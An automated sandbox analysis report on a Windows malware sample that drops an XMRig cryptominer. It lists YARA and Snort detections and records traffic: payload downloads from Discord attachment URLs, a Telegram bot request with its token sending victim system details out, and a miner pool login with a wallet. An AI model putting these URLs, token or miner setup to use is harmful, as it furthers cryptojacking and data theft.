  • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
00000041.00000003.407789264.0000000001A01000.00000004.00000020.00020000.00000000.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x6330:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x16340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x25340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x39ba:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3aec:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3b7e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4cfa:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x584e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x62b6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x632e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x63ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x8d02:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf704:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
00000046.00000003.440830795.00000000030C1000.00000004.00000020.00020000.00000000.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x6330:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x16340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x25b40:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x39ba:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3aec:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3b7e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4cfa:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x584e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x62b6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x632e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x63ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x8d02:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf704:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
0000003B.00000003.390797612.00000000030C1000.00000004.00000020.00020000.00000000.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x6330:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x16340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x25b40:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x39ba:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3aec:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3b7e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4cfa:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x584e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x62b6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x632e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x63ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x8d02:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf704:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
Click to see the 15 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
11.2.System.exe.7ff6e4c40000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x5ea40:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eaf0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eba0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5ec50:$x1: https://cdn.discordapp.com/attachments/
11.0.System.exe.7ff6e4c40000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x5ea40:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eaf0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eba0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5ec50:$x1: https://cdn.discordapp.com/attachments/
0.0.DllHost.exe.7ff7191b0000.2.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x5ea40:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eaf0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eba0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5ec50:$x1: https://cdn.discordapp.com/attachments/
0.2.DllHost.exe.7ff7191b0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x5ea40:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eaf0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eba0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5ec50:$x1: https://cdn.discordapp.com/attachments/
11.0.System.exe.7ff6e4c40000.2.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x5ea40:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eaf0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eba0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5ec50:$x1: https://cdn.discordapp.com/attachments/
Click to see the 6 entries

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:192.168.2.48.8.8.856076532036289 07/07/22-09:51:17.942916
SID:2036289
Source Port:56076
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4131.153.56.9849760802831812 07/07/22-09:51:18.141462
SID:2831812
Source Port:49760
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\ProgramData\Systemd\procexp.exeAvira: detection malicious, Label: HEUR/AGEN.1203240
Multi AV Scanner detection for submitted file
Source: DllHost.exeVirustotal: Detection: 19%Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MicrosoftNetwork\System.exeReversingLabs: Detection: 26%
Machine Learning detection for sample
Source: DllHost.exeJoe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\ProgramData\Systemd\procexp.exeJoe Sandbox ML: detected
Source: C:\ProgramData\MicrosoftNetwork\System.exeJoe Sandbox ML: detected

Bitcoin Miner

barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara matchFile source: 4.0.procexp.exe.7ff64b1d0000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000000.284069730.00007FF64BCD5000.00000008.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: procexp.exe PID: 6356, type: MEMORYSTR
Source: Yara matchFile source: C:\ProgramData\Systemd\procexp.exe, type: DROPPED
Found strings related to Crypto-Mining
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: cryptonight/0
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: -o, --url=URL URL of mining server
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: stratum+tcp://
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
Source: procexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: XMRig 6.17.0
Detected Stratum mining protocol
Source: global trafficTCP traffic: 192.168.2.4:49760 -> 131.153.56.98:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 6b 46 54 62 50 6b 72 70 45 59 38 4b 52 53 64 52 6a 7a 4c 70 61 77 64 4e 76 6d 52 31 42 54 4b 50 52 66 61 61 47 6f 71 39 54 63 44 4e 68 6e 4b 61 70 79 39 47 39 39 65 48 39 41 73 4a 6f 6e 37 36 36 59 44 59 6e 4b 45 6f 62 78 79 63 4e 53 44 75 48 62 50 47 33 4a 48 56 35 7a 4b 75 74 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 37 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 33 2e 30 20 67 63 63 2f 31 31 2e 32 2e 30 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e 2f 31 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 72 78 2f 30 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 61 73 74 72 6f 62 77 74 22 2c 22 61 73 74 72 6f 62 77 74 2f 76 32 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42kftbpkrpey8krsdrjzlpawdnvmr1btkprfaagoq9tcdnhnkapy9g99eh9asjon766ydynkeobxycnsduhbpg3jhv5zkut","pass":"x","agent":"xmrig/6.17.0 (windows nt 10.0; win64; x64) libuv/1.43.0 gcc/11.2.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt","astrobwt/v2","ghostrider"]}}
Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: DllHost.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D092C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00007FF7191D092C
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EDC14 FindFirstFileExW,0_2_00007FF7191EDC14
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6092C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,11_2_00007FF6E4C6092C
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7DC14 FindFirstFileExW,11_2_00007FF6E4C7DC14
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014005A0D0 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,44_2_000000014005A0D0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140040EE0 GetFileAttributesW,FindFirstFileW,FindClose,44_2_0000000140040EE0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014004F070 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,44_2_000000014004F070
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140061180 FindFirstFileW,Sleep,FindNextFileW,FindClose,44_2_0000000140061180
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006F660 FindFirstFileW,FindClose,44_2_000000014006F660
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008A730 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,44_2_000000014008A730
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014003EAD0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,44_2_000000014003EAD0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140059E40 FindFirstFileW,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,44_2_0000000140059E40
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006DF10 FindFirstFileW,FindNextFileW,FindClose,44_2_000000014006DF10

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Users\user\Desktop\DllHost.exeDomain query: cdn.discordapp.com
Source: C:\Users\user\Desktop\DllHost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeDomain query: api.ipify.org
Source: C:\Users\user\Desktop\DllHost.exeDomain query: api.telegram.org
Source: C:\Users\user\Desktop\DllHost.exeNetwork Connect: 52.20.78.240 443Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeNetwork Connect: 162.159.134.233 443Jump to behavior
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:56076 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.4:49760 -> 131.153.56.98:80
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\Desktop\DllHost.exeDNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\DllHost.exeDNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\DllHost.exeDNS query: name: api.ipify.org
Source: C:\ProgramData\MicrosoftNetwork\System.exeDNS query: name: api.ipify.org
Source: C:\ProgramData\MicrosoftNetwork\System.exeDNS query: name: api.ipify.org
Source: C:\ProgramData\MicrosoftNetwork\System.exeDNS query: name: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=1327052997&text=New%20User:%20618321%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%20102.129.143.92 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /attachments/993716767685873716/993957505698910218/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/993716767685873716/993957763715698769/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=1327052997&text=New%20User:%20618321%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%20102.129.143.92 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346219857.00000208C796A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346219857.00000208C796A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346219857.00000208C796A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.327004703.0000023FB3CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: DllHost.exe, 00000000.00000003.265260709.00000208C791C000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.266498419.00000208C7915000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.429596530.000002D5D97D5000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.671478152.0000023825061000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000003.419714815.00000261610CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.427052188.00000261610CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001E.00000002.426612103.000002615F755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi-
Source: powershell.exe, 0000001E.00000003.420144538.0000026161103000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.427098745.0000026161103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
Source: svchost.exe, 00000016.00000002.671478152.0000023825061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: DllHost.exe, 00000000.00000003.329725999.00000208C9733000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.330018416.00000208C9745000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.346154374.00000208C9742000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.281215930.00000208C9715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
